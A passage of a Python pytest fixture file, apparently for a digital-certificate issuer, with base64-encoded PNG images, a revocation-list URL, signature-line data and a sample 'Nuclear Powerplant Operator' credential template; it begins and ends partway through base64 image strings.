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",
"revocation_list": "https://gist.githubusercontent.com/faustow/07a66855d713409067ff28e10778e2dd/raw/e08bb6d6f1350367d3f6d4f805ab3b1466b584d7/revocation-list-testnet.json",
"intro_url": "https://verifiable.com",
"signature_lines": [
{
"job_title": "University Issuer",
"signature_image": "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJcAAABVBAMAAAC2kWv1AAAAMFBMVEX///8AAAC/v79/f39fX1+fn5/f398/Pz8fHx/Dw8NTU1Onp6cvLy93d3cnJydvb28isqiqAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADQElEQVRYhe2WS27bMBCGp5RIudsCRbasX8iqUJ3Y3hIO7HZJSJayKAqw8StLIYnTLpNFnCv0BL1NT9MLdEhJzkNSEkfaFNAPmKQl6tNwNDMkQK1atV4nyqtjsbPqWODwCmF+hSyIKmTZvELYvEIWXFbIIgJgaUZMlobZwfAiphwHZVnz6/NuPCJRqyyMvE8G7HQpCC8HY1dJvx5Pg7AcCyy5AgihvyDrbkkUqAb0gbwjG26rkijyY9NiETSuaADOawD3Az5siEtLwoFrS5i9BnYRdwxWiqr9ZdQA0ubfOcKY2hFFJI8HCzYEDw6p24aFA4f4JSA3Zslhv5A1lEL3S3BPOkxQz1EjkDZs8JqfZxgb62+dKxYCucK+9ZOFXDiqKxzYULCnoujtU3xDgTc7uBoXf/zYXjB3yrhowWYAbwuDVc+GVcYms0hM6AYH5sL5SlpqfeLJHgwVtHpFsAPdtHVD77HWutVR8UvfpP1P3IE93lFYsjlWjgIW0YbFe4RpkmQx99CZXR/ob5Cjc0SO0BsRMF5cueNANtXTbBRJspirF+i0Hnx1KUQc+lgRW0RgSOBDKh9mls80hwpy+zlMksXowxEHYa1CCREL/jQ5tagEd2tBVkI3li6dTXk9sFtJshjRPfzOkzc3wG48OAM3pDa3tFFFJda4rIE/0lFH4KTJYjTf1y1RzMdZRxBw6iwHW4cUwbTrmzbWvVmaLGbxkzieiGchff/bANjHvypdSJ6autnorcbC1YltsuhnvHixIejaRTS5oYzFBSzQZZy6Oti9UzwrZZMFWXcOjz/jg/uPhVMw2Mc+monJwh4ki37RnSkmwCz1FKxtVjueoJXDRxOpcfj26xn04CkWTPRZkK572R2CjZIJ6f/oOcMwJAcw+6JY9s5BMmF7wU9sLRRzfWgP8qrQnJuOiLu5z+6VvmrLPE/QBGLxZwAPNJO6aGWULHK3XY1Nct1qpfydDijaXZ3s5Wk6mGTvFcuFvFWy6PHgRZK5hm0r4G7+X7JOzvxVZvAyNVXOxW0OjXaD5SqFEVEBLE2JSs79VtLvFBhFSqKl9Akx1kxjWCWGoQIOpPC0tbM6gVcZq1atWrVq1fqP9Q9Wkn4v31JdhQAAAABJRU5ErkJggg==",
"name": "Your signature"
}
],
"signature_file": 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJcAAABVBAMAAAC2kWv1AAAAMFBMVEX///8AAAC/v79/f39fX1+fn5/f398/Pz8fHx/Dw8NTU1Onp6cvLy93d3cnJydvb28isqiqAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADQElEQVRYhe2WS27bMBCGp5RIudsCRbasX8iqUJ3Y3hIO7HZJSJayKAqw8StLIYnTLpNFnCv0BL1NT9MLdEhJzkNSEkfaFNAPmKQl6tNwNDMkQK1atV4nyqtjsbPqWODwCmF+hSyIKmTZvELYvEIWXFbIIgJgaUZMlobZwfAiphwHZVnz6/NuPCJRqyyMvE8G7HQpCC8HY1dJvx5Pg7AcCyy5AgihvyDrbkkUqAb0gbwjG26rkijyY9NiETSuaADOawD3Az5siEtLwoFrS5i9BnYRdwxWiqr9ZdQA0ubfOcKY2hFFJI8HCzYEDw6p24aFA4f4JSA3Zslhv5A1lEL3S3BPOkxQz1EjkDZs8JqfZxgb62+dKxYCucK+9ZOFXDiqKxzYULCnoujtU3xDgTc7uBoXf/zYXjB3yrhowWYAbwuDVc+GVcYms0hM6AYH5sL5SlpqfeLJHgwVtHpFsAPdtHVD77HWutVR8UvfpP1P3IE93lFYsjlWjgIW0YbFe4RpkmQx99CZXR/ob5Cjc0SO0BsRMF5cueNANtXTbBRJspirF+i0Hnx1KUQc+lgRW0RgSOBDKh9mls80hwpy+zlMksXowxEHYa1CCREL/jQ5tagEd2tBVkI3li6dTXk9sFtJshjRPfzOkzc3wG48OAM3pDa3tFFFJda4rIE/0lFH4KTJYjTf1y1RzMdZRxBw6iwHW4cUwbTrmzbWvVmaLGbxkzieiGchff/bANjHvypdSJ6autnorcbC1YltsuhnvHixIejaRTS5oYzFBSzQZZy6Oti9UzwrZZMFWXcOjz/jg/uPhVMw2Mc+monJwh4ki37RnSkmwCz1FKxtVjueoJXDRxOpcfj26xn04CkWTPRZkK572R2CjZIJ6f/oOcMwJAcw+6JY9s5BMmF7wU9sLRRzfWgP8qrQnJuOiLu5z+6VvmrLPE/QBGLxZwAPNJO6aGWULHK3XY1Nct1qpfydDijaXZ3s5Wk6mGTvFcuFvFWy6PHgRZK5hm0r4G7+X7JOzvxVZvAyNVXOxW0OjXaD5SqFEVEBLE2JSs79VtLvFBhFSqKl9Akx1kxjWCWGoQIOpPC0tbM6gVcZq1atWrVq1fqP9Q9Wkn4v31JdhQAAAABJRU5ErkJggg==',
})
@pytest.fixture
def template() -> Dict:
yield AttrDict({
"id": "123Y-UI12-3YUI",
"title": "Nuclear Powerplant Operator",
"description": "Operators know how to run the plant.",
"criteria_narrative": "Candidates are tested on...",
"image": "data:image/png;base64,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